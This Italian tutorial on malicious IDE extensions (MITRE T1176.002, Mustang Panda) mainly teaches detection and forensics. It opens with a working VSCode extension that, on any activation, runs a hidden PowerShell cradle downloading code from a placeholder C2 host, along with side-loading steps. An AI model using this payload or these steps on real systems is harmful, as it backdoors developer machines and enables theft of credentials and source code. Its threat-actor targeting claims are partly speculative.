Estensioni IDE Malevole: Browser Extension Malware (T1176.002)

Per comprendere la minaccia, iniziamo creando un'estensione VSCode malevola minimale. La struttura base richiede solo due file: manifest e codice di attivazione.

Crea il file package.json per l'estensione:

{
  "name": "code-helper",
  "version": "1.0.0",
  "engines": {"vscode": "^1.50.0"},
  "activationEvents": ["*"],
  "main": "./extension.js"
}

Il payload JavaScript che stabilisce persistenza:

const vscode = require('vscode');
const { exec } = require('child_process');

function activate(context) {
    exec('powershell -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(\'http://c2.evil/beacon\')"');
}

L'installazione può avvenire via CLI bypassando il marketplace: code --install-extension malicious.vsix. Per testare la funzionalità tunnel di Mustang Panda, usa code tunnel per creare un tunnel SSH persistente verso il C2.

Su Linux, le estensioni risiedono in ~/.vscode/extensions. Puoi side-loadare direttamente copiando i file: cp -r malicious-extension ~/.vscode/extensions/

IntelliJ IDEA memorizza i plugin in ~/.config/JetBrains. Eclipse usa una struttura più complessa sotto workspace/.metadata/.plugins. Ogni IDE ha meccanismi di trust diversi ma tutti eseguono codice arbitrario all'avvio.

Per simulare exfiltration silenziosa, integra la tua estensione con l'API di workspace per monitorare file aperti e modifiche. Il codice viene eseguito nel contesto dell'utente sviluppatore, garantendo accesso a repository, chiavi SSH e token di autenticazione.

La detection efficace richiede correlazione tra processi IDE, modifiche filesystem e connessioni di rete. I falsi positivi sono inevitabili in ambienti di sviluppo, quindi la chiave sta nel contesto.

Monitora Windows EventID 4688 per processi IDE con flag sospetti:

• code.exe --install-extension
• idea64.exe --force
• eclipse.exe --user-data-dir

Sysmon EventID 1 cattura la command line completa. Cerca pattern di installazione non interattiva o percorsi di data directory anomali.

Le modifiche ai percorsi delle estensioni generano EventID 11 di Sysmon. Correla scritture in:

• C:\Users\%USERNAME%\.vscode\extensions
• C:\Users\%USERNAME%\AppData\Roaming\Code\User

Network monitoring è cruciale. IDE legittimi contattano marketplace noti ma tunnel SSH verso IP sconosciuti sono red flag immediate. Zeek può identificare tunnel SSH anomali originati da processi IDE.

Per ridurre i falsi positivi, mantieni una baseline degli sviluppatori autorizzati. Alert solo quando IDE vengono eseguiti su server di produzione o da utenti non-developer. La detection DET0561 suggerisce un TimeWindow di 15-30 minuti per correlare eventi.

Implementa allowlist per domini marketplace legittimi:

• marketplace.visualstudio.com
• plugins.jetbrains.com

Flag immediato per connessioni verso GitHub raw content o domini di tunneling sconosciuti post-installazione estensione.

L'analisi forense delle estensioni IDE richiede attenzione ai dettagli nelle directory di profilo utente. Su Windows, VSCode mantiene log dettagliati in %APPDATA%\Code\logs.

La timeline reconstruction inizia identificando il momento di installazione. Cerca nel registro: HKEY_CURRENT_USER\Software\Classes\Applications\Code.exe

Le estensioni lasciano tracce in manifest.json con timestamp di installazione. Confronta con i log di rete per identificare download da marketplace o trasferimenti laterali.

Su Linux, auditd registra le syscall execve per processi IDE. Filtra per: ausearch -k ide_execution -ts recent

Le estensioni malevole spesso creano processi child. Analizza la process tree per identificare ssh, node o powershell spawned dall'IDE. Memory forensics con Volatility può rivelare injection o hook installati dalle estensioni.

Per Mustang Panda, cerca evidenze di tunnel SSH:

• File .ssh/config modificati
• Processi ssh con parent code.exe
• Connessioni persistenti su porte non standard

I workspace VSCode mantengono history in .vscode/. Analizza workspace.json per progetti aperti durante il compromise. Le estensioni possono aver esfiltrato codice sorgente o credenziali embedded.

Artifact timeline deve includere:

1. Prima apparizione processo IDE
2. Creazione/modifica directory estensioni
3. Prima connessione outbound post-installazione
4. Processi child anomali
5. Modifiche a file di configurazione IDE

Mustang Panda (G0129) rappresenta l'unico gruppo documentato per questa tecnica, ma il pattern suggerisce adozione futura più ampia. Il gruppo ha dimostrato sofisticazione nell'abuso di funzionalità legittime VSCode.

La scelta di IDE come vettore di persistenza indica targeting mirato verso:

• Aziende software con IP valuable
• Contractor governativi con accesso a codice classificato
• Supply chain di software enterprise

Il comando code.exe tunnel sfruttato da Mustang Panda permette accesso remoto completo bypassando firewall aziendali. La funzionalità, progettata per sviluppo remoto legittimo, diventa backdoor perfetta.

Pattern geografici suggeriscono focus su:

• Silicon Valley per proprietà intellettuale
• Contractor difesa per codice weapons systems
• Fintech per algoritmi trading

L'evoluzione probabile include:

• Estensioni che rubano credenziali da file .env
• Mining di repository Git locali per secrets
• Keylogging mirato su IDE per catturare codice

La supply chain delle estensioni rappresenta il vettore futuro più preoccupante. Compromettere estensioni popolari garantirebbe accesso a migliaia di sviluppatori. Monitora marketplace per estensioni con cambi di ownership sospetti o update che aggiungono network capabilities.

Tecnica documentata nel framework MITRE ATT&CK come T1176.002. Attività di Mustang Panda (G0129) confermata tramite telemetria VSCode tunnel. Riferimenti detection DET0561 per Windows, Linux e macOS. Mitigazioni validate: User Training (M1017), Limit Software Installation (M1033), Execution Prevention (M1038), Audit (M1047), Update Software (M1051).